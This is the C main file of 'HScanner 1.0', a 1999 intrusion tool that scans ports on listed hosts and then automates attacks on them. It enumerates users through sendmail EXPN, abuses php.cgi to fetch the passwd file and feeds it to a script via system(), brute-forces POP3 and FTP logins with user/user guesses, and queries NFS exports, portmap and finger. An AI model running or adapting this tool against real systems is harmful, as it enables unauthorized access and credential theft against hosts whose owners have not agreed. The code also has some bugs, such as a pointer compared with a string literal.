/************************************************
*
*   Host Scanner
*   R 1.0
*   
*   6th September 1999
*
*   coded by Sb : seb-sb@caramail.com
*   Additionnal : shado
*
*   hostscan [-h/-l/-n] hostfile||host
*
************************************************/


#include <stdio.h>
#include <signal.h>
#include <setjmp.h>

#define MIN_PORT 10
#define MAX_PORT 41

#include "hscanner.h"
#include "hscandef.h"
#include "hsconfig.h"

jmp_buf env;
void fsig(int);
/***********************************************************/
/********************** Main function **********************/
/***********************************************************/

int main(int argc,char *argv[])
{
int i;
int sig=0,sig1=0,cmd_status=1,scan_type=MIN_PORT;
FILE *hfile, *lfile,*cfile,*exfile;
char hname[45];
char buffer[150];
char dir[80];
char tmp1[80],tmp2[80];
char phptmp[150];

/***************************************************************
Config int table organisation.
config : 0 -> finger
config : 1 -> test php
config : 2 -> smtp guessing
config : 3 -> pop3 Brute force : user/user
config : 4 -> ftp  Brute force : user/user
config : 5 -> rpcinfo request
config : 6 -> nfs exports list
config : 7 -> Daemon report.
*****************************************************************/

int config[8]={0,0,0,0,0,0,0,0};
int scan_on=1,res;
int port_open[41]={0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};
int port_list[2][MAX_PORT]={{21,23,25,43,79,80,110,143,513,2049},{21,22,23,25,43,53,67,69,70,79,80,88,109,110,111,119,121,130,131,132,137,139,143,156,161,162,177,178,396,513,666,1352,2000,2002,2049,3264,5130,5133,6000,6667,7100}};

/*************** Interrupting TERM signal to write data ***********/

signal(SIGTERM,fsig);

fprintf(stderr,"HScanner 1.0\n\tMain code : Sb\n\tAdditional code : shado\n");


if(argc!=3)
	{
	fprintf(stderr,"Usage : %s [-l/-h/-n] <hostfile>\n\t\t\t      <host>\n",argv[0]);
	exit(-1);
	}

/******************* Opening config file *************************/

if(!(cfile=fopen("hscanner.cfg","r")))
        {
        fprintf(stderr,"Can't open config file.\n");
	create_config();
        }
set_config(cfile,&(config[0]));

/*****************Checking if argv[2] is a file name.
/***************** If not,assuming it is an host name. 
/*****************if cmd_status is set, hname is an host. */

if(!(hfile=fopen(argv[2],"r")))
	{
	strcpy(hname,argv[2]);
	cmd_status=0; 
	}

if(!(strcmp(argv[1],"-h"))) scan_type=MAX_PORT;
if(!(strcmp(argv[1],"-n"))) scan_on=0;

/**************** Opening export log file. ********************/
/*
strcpy(dir,argv[2]);
strcat(dir,".exports");
strcpy(tmp1,dir);
if(!(exfile=freopen(dir,"w",stdout)))
	{
	fprintf(stderr,"Can't create log file. Exiting.\n");
	exit(-1);
	}
*/
/**************** Opening main log file ***********************/

nuke(dir,80);
strcpy(dir,argv[2]);
strcat(dir,".log");
lfile=fopen(dir,"w");
strcpy(tmp2,dir);

/***************** Begining of the scanning operations *****************/

do
	{

	if(cmd_status)
		{
		if(!(fgets(hname,23,hfile))) break;
		if(hname=="\0") continue;
		hname[strlen(hname)-1]='\0';
		}

	if(setjmp(env)!=0) 
		{
		fprintf(stderr,"Exit requested by user.\n");
		break;
		}

	if(checkhost(hname)) 
		{
		if(!(cmd_status)) 
			{
			fclose(exfile);
			fclose(lfile);
			remove(tmp1);
			remove(tmp2);
			}
		continue;
		}

/****************** Host from host file or command line is OK
/****************** Going on scanning */
		
        fprintf(stderr,"Scanning %s.\n",hname);

	fprintf(lfile,"------------------\nHost %s exists.\n------------------\n",&hname[0]);
	
/****************** Scanning ports **************************/
	if(scan_on)
	{
	for(i=0;i<scan_type;i++)
		{
		if(scan_type==MIN_PORT)
			port_open[i]=port_check(hname,port_list[0][i]);
		if(scan_type==MAX_PORT) 
			port_open[i]=port_check(hname,port_list[1][i]);
		} 
	write_port(lfile,scan_type,&(port_open[0]));
	}
/**************************** Getting available informations from scanned host.
/**************************** Using port_open and config tabs to request
/**************************** informations. */

/*   Getting valid logins on a system by abusing expn sendmail command */
/*   ----------------------------------------------------------------- */

	if(config[2]&&(((scan_type==MIN_PORT) &&( port_open[2])||(scan_type==MAX_PORT)&&(port_open[3]))||port_check(hname,25)))
        		{
        		if(smtp_guess(hname,lfile))
				fprintf(stderr,"Error opening user.smtp\n");
       		 	}

/*  Trying to abuse php.cgi to get passwd file */
/*  ------------------------------------------ */

        if(config[1]&&(((scan_type==MIN_PORT) &&( port_open[5])||(scan_type==MAX_PORT)&&(port_open[9]))||port_check(hname,80)))
			{
			
			strcpy(phptmp,"./userdump.pl<");
			strcat(phptmp,hname);
			strcat(phptmp,".passwd.php>>user.brute");
			if(!(php_check(hname,lfile))) system(phptmp);
			
			}

/*  Retrieving ftp daemon .*/
/*  ---------------------  */

	if(config[7]&&(((scan_type==MIN_PORT) &&( port_open[0])||(scan_type==MAX_PORT)&&(port_open[0]))||port_check(hname,21)))
			{
fprintf(stderr,"Getting ftpd.\n");
			get_prompt(hname,21,lfile);
			}

/* Retrieving smtp daemon .*/
/* ----------------------  */

	if(config[7]&&(((scan_type==MIN_PORT) &&( port_open[2])||(scan_type==MAX_PORT)&&(port_open[3]))||port_check(hname,25)))
			{
fprintf(stderr,"Getting smtpd.\n");
			get_prompt(hname,25,lfile);
			}

/* Trying to get L/P by POP3 brute force */
/* ------------------------------------- */

        if(config[3]&&(((scan_type==MIN_PORT) &&( port_open[6])||(scan_type==MAX_PORT)&&(port_open[13]))||port_check(hname,110)))
		{
		res=pop3_brute(hname,lfile);
		if(res==1) fprintf(stderr,"Can't open user.brute for POP3 brute force.\n");
		if(res==2) fprintf(stderr,"POP3 possibly non available.\n");
		}

/* Trying to get L/P by FTP brute force */
/****************************************/

        if(config[4]&&(((scan_type==MIN_PORT) &&( port_open[0])||(scan_type==MAX_PORT)&&(port_open[0]))||port_check(hname,21)))
                {
                res=ftp_brute(hname,lfile);
                if(res==1) fprintf(stderr,"Can't open user.brute for FTP brute force.\n");
                if(res==2) fprintf(stderr,"FTP possibly non available.\n");
                }

/*  Requesting exported volume by using showmount shell command. */
/*  ------------------------------------------------------------ */

        if(config[6]&&(((scan_type==MIN_PORT) &&( port_open[9])||(scan_type==MAX_PORT)&&(port_open[33]))||port_check(hname,2049)))
                        {
                        nfs_check(hname,lfile,dir);
                        }

/*  Requesting info from portmap */
/*  ---------------------------- */

        if(config[5]&&(((scan_type==MAX_PORT)&&(port_open[14]))||port_check(hname,111)))
                        {
                        portmap_check(hname,lfile,dir);
                        }

/*  Requesting finger on host */
/*  ------------------------- */

        if(config[0]&&(((scan_type==MIN_PORT) &&( port_open[4])||(scan_type==MAX_PORT)&&(port_open[9]))||port_check(hname,79)))
                        {
                        finger_check(hname,lfile,dir);
                        }


	} while(cmd_status);

/********************* Closing files *************************/

fclose(lfile);
fclose(hfile);
fclose(cfile);
fclose(exfile);
return(0);
}

/********************* Requested when TERM signal is send to the program.
/********************* Long jump to close files and exit correctly. */

void fsig(int n)
{
longjmp(env,1);
}

